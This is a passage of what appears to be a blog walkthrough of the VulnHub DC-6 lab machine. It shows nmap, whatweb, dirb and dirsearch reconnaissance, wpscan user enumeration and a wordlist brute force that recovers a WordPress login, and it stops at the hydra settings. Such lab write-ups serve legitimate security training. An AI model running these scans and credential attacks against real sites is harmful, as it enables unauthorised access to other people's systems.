VulnHub Lab Hands-On Series: DC-6 Walkthrough

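Disclaimer

This document is for learning and research only. Do not use the techniques or source code described here for illegal purposes; the author accepts no responsibility for any negative consequences caused by anyone.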

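Contents

  • Disclaimer
  • Preface
  • 1. Environment setup
  • 2. Information gathering
    • 2.1 Host discovery
      • 2.1.1 Scanning for live hosts with nmap
      • 2.1.2 Scanning for live hosts with arp-scan
    • 2.2 Port scanning
    • 2.3 Fingerprinting
      • 2.3.1 First fingerprinting attempt
      • 2.3.2 Editing the hosts file
      • 2.3.3 Fingerprinting again
      • 2.3.4 Visiting the site in a browser
      • 2.3.5 Web fingerprinting with the Wappalyzer extension
    • 2.4 Directory scanning
      • 2.4.1 Directory scan with dirb
      • 2.4.2 Directory scan with dirsearch
    • 2.5 Trying to access the pages
      • 2.5.1 Trying wp-admin
      • 2.5.2 Trying wp-includes
  • 3. Penetration testing
    • 3.1 Brute-forcing usernames with wpscan
      • 3.1.1 Brute-forcing usernames
      • 3.1.2 Saving the username list
    • 3.2 Generating the password wordlist
    • 3.3 Brute-forcing the web login
      • 3.3.1 Brute-forcing with wpscan
      • 3.3.2 Brute-forcing with hydra
    • 3.4 The mark user
      • 3.4.1 Login page
      • 3.4.2 The Tools plugin
      • 3.4.3 Vulnerability search
      • 3.4.4 Viewing the PoC file
      • 3.4.5 Running the PoC file
      • 3.4.6 Reverse shell
        • 3.4.6.1 Listening on port 6666 on Kali
        • 3.4.6.2 Reverse shell
        • 3.4.6.3 Spawning a standard terminal
      • 3.4.7 Attempting SUID privilege escalation
      • 3.4.8 More system information
    • 3.5 The graham user
      • 3.5.1 Switching to the graham user
      • 3.5.2 Attempting sudo privilege escalation again
      • 3.5.3 Writing bash into backups.sh
    • 3.6 The jens user
      • 3.6.1 Switching to the jens user
      • 3.6.2 Listing SUID executables
      • 3.6.3 Listing commands allowed by sudo
    • 3.7 Privilege escalation with nmap
      • 3.7.1 Creating the shell.nse file
      • 3.7.2 Running the shell.nse file
      • 3.7.3 Reading the flag
  • Penetration summary
  • References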


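Preface

Today's test covers penetrating the DC-6 target:

Vulnhub is a lab platform that provides a variety of vulnerable environments. Most of them are prebuilt virtual machine images designed with multiple vulnerabilities.
This article walks through a penetration test of the DC-6 target, covering nmap scanning, arp-scan scanning, website fingerprinting with whatweb and Wappalyzer, directory scanning with dirb or dirsearch, brute-forcing WordPress usernames with wpscan, generating a password wordlist, brute-forcing the login page with wpscan, brute-forcing the web page with xhydra, finally gaining root through nmap privilege escalation, Linux kernel privilege escalation, and more.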

DESCRIPTION
DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
This isn’t an overly difficult challenge so should be great for beginners.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.


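1. Environment setup

Target information

Official download link: https://www.vulnhub.com/entry/dc-6,315/
Release date: April 29, 2019
Lab image size: 619MB
Author: DCAU
Series: DC
Difficulty: ★☆☆☆☆

For the penetration-testing environment setup, see the author's earlier post; it is not repeated here:

VulnHub Lab Hands-On Series: DC-2 Walkthrough: https://editor.csdn.net/md/?articleId=139026849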


2. Information gathering

2.1 Host discovery

2.1.1 Scanning for live hosts with nmap

┌──(root㉿kali)-[/home/kali]
└─# nmap -sP 192.168.6.0/24           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 11:04 EDT
Nmap scan report for 192.168.6.1
Host is up (0.00037s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.6.2
Host is up (0.00045s latency).
MAC Address: 00:50:56:F5:7B:9F (VMware)
Nmap scan report for 192.168.6.157
Host is up (0.00050s latency).
MAC Address: 00:0C:29:C2:C2:87 (VMware)
Nmap scan report for 192.168.6.254
Host is up (0.00037s latency).
MAC Address: 00:50:56:F1:DB:25 (VMware)
Nmap scan report for 192.168.6.66
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 28.09 seconds

2.1.2 Scanning for live hosts with arp-scan

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l           
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.6.66
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.1	00:50:56:c0:00:08	VMware, Inc.
192.168.6.2	00:50:56:f5:7b:9f	VMware, Inc.
192.168.6.157	00:0c:29:c2:c2:87	VMware, Inc.
192.168.6.254	00:50:56:f1:db:25	VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.324 seconds (110.15 hosts/sec). 4 responded

From the above, excluding the Kali attack machine's IP, the target's details are:
IP address: 192.168.6.157
MAC address: 00:0c:29:c2:c2:87

2.2 Port scanning

┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA dc-7 192.168.6.157
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 11:07 EDT
Nmap scan report for 192.168.6.157
Host is up (0.00044s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Did not follow redirect to http://wordy/
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 00:0C:29:C2:C2:87 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.35 seconds

The nmap port scan shows that the target has ports 22 and 80 open:
Port 22: SSH service
Port 80: HTTP service

2.3 Fingerprinting

2.3.1 First fingerprinting attempt

┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.6.157
WhatWeb report for http://192.168.6.157
Status    : 301 Moved Permanently
Title     : <None>
IP        : 192.168.6.157
Country   : RESERVED, ZZ

Summary   : Apache[2.4.25], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], RedirectLocation[http://wordy/], UncommonHeaders[x-redirect-by]

Detected Plugins:
[ Apache ]
    The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards.

    Version      : 2.4.25 (from HTTP Server Header)
    Google Dorks: (3)
    Website     : http://httpd.apache.org/

[ HTTPServer ]
    HTTP server header string. This plugin also attempts to identify the operating system from the server header.

    OS           : Debian Linux
    String       : Apache/2.4.25 (Debian) (from server string)

[ RedirectLocation ]
    HTTP Server string location. used with http-status 301 and 302

    String       : http://wordy/ (from location)

[ UncommonHeaders ]
    Uncommon HTTP server headers. The blacklist includes all the standard headers and many non standard but common ones. Interesting but fairly common headers should have their own plugins, eg. x-powered-by, server and x-aspnet-version. Info about headers can be found at www.http-stats.com

    String       : x-redirect-by (from headers)

HTTP Headers:
    HTTP/1.1 301 Moved Permanently
    Date: Tue, 28 May 2024 15:11:47 GMT
    Server: Apache/2.4.25 (Debian)
    X-Redirect-By: WordPress
    Location: http://wordy/
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8

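The result shows that the target runs the WordPress CMS. No WordPress version information was obtained because the request was redirected; the next step resolves this.

2.3.2 Editing the hosts file

Add the following line to the hosts file:
192.168.6.157 wordy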

┌──(root㉿kali)-[/home/kali]
└─# vim /etc/hosts

┌──(root㉿kali)-[/home/kali]
└─# cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.6.154 dc-2
192.168.6.157 wordy

2.3.3 Fingerprinting again

┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.6.157
WhatWeb report for http://192.168.6.157
Status    : 301 Moved Permanently
Title     : <None>
IP        : 192.168.6.157
Country   : RESERVED, ZZ

Summary   : Apache[2.4.25], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], RedirectLocation[http://wordy/], UncommonHeaders[x-redirect-by]

Detected Plugins:
[ Apache ]
    The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards.

    Version      : 2.4.25 (from HTTP Server Header)
    Google Dorks: (3)
    Website     : http://httpd.apache.org/

[ HTTPServer ]
    HTTP server header string. This plugin also attempts to identify the operating system from the server header.

    OS           : Debian Linux
    String       : Apache/2.4.25 (Debian) (from server string)

[ RedirectLocation ]
    HTTP Server string location. used with http-status 301 and 302

    String       : http://wordy/ (from location)

[ UncommonHeaders ]
    Uncommon HTTP server headers. The blacklist includes all the standard headers and many non standard but common ones. Interesting but fairly common headers should have their own plugins, eg. x-powered-by, server and x-aspnet-version. Info about headers can be found at www.http-stats.com

    String       : x-redirect-by (from headers)

HTTP Headers:
    HTTP/1.1 301 Moved Permanently
    Date: Tue, 28 May 2024 15:25:30 GMT
    Server: Apache/2.4.25 (Debian)
    X-Redirect-By: WordPress
    Location: http://wordy/
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8

WhatWeb report for http://wordy/
Status    : 200 OK
Title     : Wordy &#8211; Just another WordPress site
IP        : 192.168.6.157
Country   : RESERVED, ZZ

Summary   : Apache[2.4.25], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], JQuery[1.12.4], MetaGenerator[WordPress 5.1.1], PoweredBy[WordPress], Script[text/javascript], UncommonHeaders[link], WordPress[5.1.1]

Detected Plugins:
[ Apache ]
    The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards.

    Version      : 2.4.25 (from HTTP Server Header)
    Google Dorks: (3)
    Website     : http://httpd.apache.org/

[ HTML5 ]
    HTML version 5, detected by the doctype declaration

[ HTTPServer ]
    HTTP server header string. This plugin also attempts to identify the operating system from the server header.

    OS           : Debian Linux
    String       : Apache/2.4.25 (Debian) (from server string)

[ JQuery ]
    A fast, concise, JavaScript that simplifies how to traverse HTML documents, handle events, perform animations, and add AJAX.

    Version      : 1.12.4
    Website     : http://jquery.com/

[ MetaGenerator ]
    This plugin identifies meta generator tags and extracts its value.

    String       : WordPress 5.1.1

[ PoweredBy ]
    This plugin identifies instances of 'Powered by x' text and attempts to extract the value for x.

    String       : WordPress

[ Script ]
    This plugin detects instances of script HTML elements and returns the script language/type.

    String       : text/javascript

[ UncommonHeaders ]
    Uncommon HTTP server headers. The blacklist includes all the standard headers and many non standard but common ones. Interesting but fairly common headers should have their own plugins, eg. x-powered-by, server and x-aspnet-version. Info about headers can be found at www.http-stats.com

    String       : link (from headers)

[ WordPress ]
    WordPress is an opensource blogging system commonly used as a CMS.

    Version      : 5.1.1
    Aggressive function available (check plugin file or details).
    Google Dorks: (1)
    Website     : http://www.wordpress.org/

HTTP Headers:
    HTTP/1.1 200 OK
    Date: Tue, 28 May 2024 15:25:32 GMT
    Server: Apache/2.4.25 (Debian)
    Link: <http://wordy/index.php/wp-json/>; rel="https://api.w.org/"
    Link: <http://wordy/>; rel=shortlink
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 18051
    Connection: close
    Content-Type: text/html; charset=UTF-8

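2.3.4 Visiting the site in a browser

[Screenshot: DC-6 welcome page]

2.3.5 Web fingerprinting with the Wappalyzer extension

[Screenshot: Wappalyzer information gathering]
The relevant technical details are listed in the table below:

Item | Technical details
Content management system | WordPress 5.1.1
Programming language | PHP
Blog | WordPress 5.1.1
Operating system | Debian
Fonts | Google Font API, Twitter Emoji (Twemoji)
Database | MySQL
Miscellaneous | RSS
JavaScript libraries | jQuery Migrate 1.4.1, jQuery 1.12.4
Web server | Apache HTTPServer 2.4.25
WordPress themes | Twenty Seventeen

In summary, the WordPress version was obtained:
Version : 5.1.1

2.4 Directory scanning

2.4.1 Directory scan with dirb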

┌──(root㉿kali)-[/home/kali]
└─# dirb http://192.168.6.157

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue May 28 12:02:29 2024
URL_BASE: http://192.168.6.157/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.6.157/ ----
+ http://192.168.6.157/index.php (CODE:200|SIZE:53227)
+ http://192.168.6.157/server-status (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.6.157/wp-admin/
==> DIRECTORY: http://192.168.6.157/wp-content/
==> DIRECTORY: http://192.168.6.157/wp-includes/
+ http://192.168.6.157/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://192.168.6.157/wp-admin/ ----
+ http://192.168.6.157/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.6.157/wp-admin/css/
==> DIRECTORY: http://192.168.6.157/wp-admin/images/
==> DIRECTORY: http://192.168.6.157/wp-admin/includes/
+ http://192.168.6.157/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.6.157/wp-admin/js/
==> DIRECTORY: http://192.168.6.157/wp-admin/maint/
==> DIRECTORY: http://192.168.6.157/wp-admin/network/
==> DIRECTORY: http://192.168.6.157/wp-admin/user/

---- Entering directory: http://192.168.6.157/wp-content/ ----
+ http://192.168.6.157/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.6.157/wp-content/plugins/
==> DIRECTORY: http://192.168.6.157/wp-content/themes/
==> DIRECTORY: http://192.168.6.157/wp-content/uploads/

---- Entering directory: http://192.168.6.157/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.6.157/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.6.157/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.6.157/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.6.157/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.6.157/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.6.157/wp-admin/network/ ----
+ http://192.168.6.157/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.6.157/wp-admin/network/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.6.157/wp-admin/user/ ----
+ http://192.168.6.157/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.6.157/wp-admin/user/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.6.157/wp-content/plugins/ ----
+ http://192.168.6.157/wp-content/plugins/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.6.157/wp-content/themes/ ----
+ http://192.168.6.157/wp-content/themes/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.6.157/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Tue May 28 12:03:03 2024
DOWNLOADED: 32284 - FOUND: 12

2.4.2 Directory scan with dirsearch

┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.6.157 -e * -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481

Output File: /home/kali/reports/_192.168.6.157/_24-05-28_12-05-18.txt

Target: http://192.168.6.157/

[12:05:18] Starting: 
[12:05:21] 403 -  299B  - /.ht_wsr.txt                                      
[12:05:21] 403 -  302B  - /.htaccess.orig                                   
[12:05:21] 403 -  302B  - /.htaccess.save
[12:05:21] 403 -  304B  - /.htaccess.sample
[12:05:21] 403 -  302B  - /.htaccess.bak1                                   
[12:05:22] 403 -  300B  - /.htaccess_sc
[12:05:22] 403 -  300B  - /.htaccessBAK
[12:05:22] 403 -  301B  - /.htaccessOLD2                                    
[12:05:22] 403 -  292B  - /.htm                                             
[12:05:22] 403 -  293B  - /.html
[12:05:22] 403 -  302B  - /.htpasswd_test                                   
[12:05:22] 403 -  298B  - /.htpasswds                                       
[12:05:22] 403 -  302B  - /.htaccess_orig                                   
[12:05:22] 403 -  299B  - /.httr-oauth                                      
[12:05:22] 403 -  303B  - /.htaccess_extra                                  
[12:05:22] 403 -  300B  - /.htaccessOLD                                     
[12:05:24] 403 -  292B  - /.php                                             
[12:05:24] 403 -  293B  - /.php3                                            
[12:06:05] 200 -   18KB - /index.php                                        
[12:06:09] 200 -    7KB - /license.txt                                      
[12:06:28] 200 -    3KB - /readme.html                                      
[12:06:31] 403 -  301B  - /server-status                                    
[12:06:31] 403 -  302B  - /server-status/                                   
[12:06:50] 301 -  317B  - /wp-admin  ->  http://192.168.6.157/wp-admin/     
[12:06:50] 302 -    0B  - /wp-admin/  ->  http://wordy/wp-login.php?redirect_to=http%3A%2F%2F192.168.6.157%2Fwp-admin%2F&reauth=1
[12:06:51] 200 -    0B  - /wp-config.php                                    
[12:06:51] 500 -    3KB - /wp-admin/setup-config.php                        
[12:06:51] 400 -    1B  - /wp-admin/admin-ajax.php                          
[12:06:51] 200 -  517B  - /wp-admin/install.php                             
[12:06:51] 301 -  319B  - /wp-content  ->  http://192.168.6.157/wp-content/ 
[12:06:51] 200 -    0B  - /wp-content/
[12:06:51] 403 -  324B  - /wp-content/plugins/akismet/admin.php             
[12:06:51] 500 -    0B  - /wp-content/plugins/hello.php                     
[12:06:51] 403 -  326B  - /wp-content/plugins/akismet/akismet.php           
[12:06:51] 200 -  456B  - /wp-content/uploads/                              
[12:06:52] 200 -    1KB - /wp-login.php                                     
[12:06:52] 302 -    0B  - /wp-signup.php  ->  http://wordy/wp-login.php?action=register
[12:06:52] 500 -    0B  - /wp-includes/rss-functions.php                    
[12:06:52] 200 -    0B  - /wp-cron.php                                      
[12:06:52] 200 -    4KB - /wp-includes/                                     
[12:06:52] 301 -  320B  - /wp-includes  ->  http://192.168.6.157/wp-includes/
[12:06:53] 405 -   42B  - /xmlrpc.php

Task Completed

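In summary, a few notable items were found:

Page | Path
Admin back-end page | /wp-admin -> http://192.168.6.157/wp-admin/
File includes page | /wp-includes -> http://192.168.6.157/wp-includes/
Site content page | /wp-content -> http://192.168.6.157/wp-content/
Site registration page | /wp-signup.php -> http://wordy/wp-login.php?action=register

The DC-6 target has file inclusion, unauthorized access and other vulnerabilities, O(∩_∩)O haha~

2.5 Trying to access the pages

2.5.1 Trying wp-admin

URL: http://192.168.6.157/wp-admin/
Returned page:
[Screenshot: admin page]

2.5.2 Trying wp-includes

URL: http://192.168.6.157/wp-includes/
Returned page:
[Screenshot: excerpt of the includes page]
Access is not possible without logging in. Approach: brute-force the username and password.


3. Penetration testing

3.1 Brute-forcing usernames with wpscan

3.1.1 Brute-forcing usernames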

┌──(root㉿kali)-[/home/kali]
└─# wpscan --url http://wordy -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://wordy/ [192.168.6.157]
[+] Started: Tue May 28 12:44:35 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://wordy/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://wordy/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
 | Found By: Rss Generator (Passive Detection)
 |  - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
 |  - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://wordy/wp-content/themes/twentyseventeen/
 | Last Updated: 2024-04-02T00:00:00.000Z
 | Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.6
 | Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue May 28 12:44:44 2024
[+] Requests Done: 71
[+] Cached Requests: 6
[+] Data Sent: 16.392 KB
[+] Data Received: 13.463 MB
[+] Memory used: 190.902 MB
[+] Elapsed time: 00:00:08

Five usernames were obtained:

Username
admin
graham
jens
mark
sarah

3.1.2 Saving the username list

Run the following commands in order to save the usernames to the users.txt file:

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# echo "admin\ngraham\njens\nmark\nsarah"> users.txt

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# ls
users.txt

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# cat users.txt
admin
graham
jens
mark
sarah

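The username list was saved successfully.

3.2 Generating the password wordlist

The lab's official page gives the following hint:

[Screenshot: hint from the official documentation]

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]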
└─# ls
passwords.txt  users.txt

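The password wordlist passwords.txt was generated successfully.

3.3 Brute-forcing the web login

We can brute-force the web login page with either wpscan or xhydra; both are covered below.

3.3.1 Brute-forcing with wpscan

This took about 6 minutes 33 seconds!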

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# wpscan --url http://wordy -U users.txt -P passwords.txt 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://wordy/ [192.168.6.157]
[+] Started: Tue May 28 13:43:00 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://wordy/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://wordy/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
 | Found By: Rss Generator (Passive Detection)
 |  - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
 |  - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://wordy/wp-content/themes/twentyseventeen/
 | Last Updated: 2024-04-02T00:00:00.000Z
 | Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.6
 | Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=========================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 5 user/s
[SUCCESS] - mark / helpdesk01
Trying jens / !lak019b Time: 00:06:33 <===============================================           > (12547 / 15215) 82.46%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: mark, Password: helpdesk01

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue May 28 13:49:47 2024
[+] Requests Done: 12720
[+] Cached Requests: 5
[+] Data Sent: 6.222 MB
[+] Data Received: 7.74 MB
[+] Memory used: 312.531 MB
[+] Elapsed time: 00:06:46

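3.3.2 Brute-forcing with hydra

Use xhydra to brute-force the web login page,
with the following settings:
Target: 192.168.6.157
Protocol: http-post-form
[Screenshot: Target]
Username List: /home/kali/dev_run_app/vulhub/dc-6/users.txt
Password List: /home/kali/dev_run_app/vulhub/dc-6/passwords.txt
[Screenshot: passwords]
Settings on the Specific tab:
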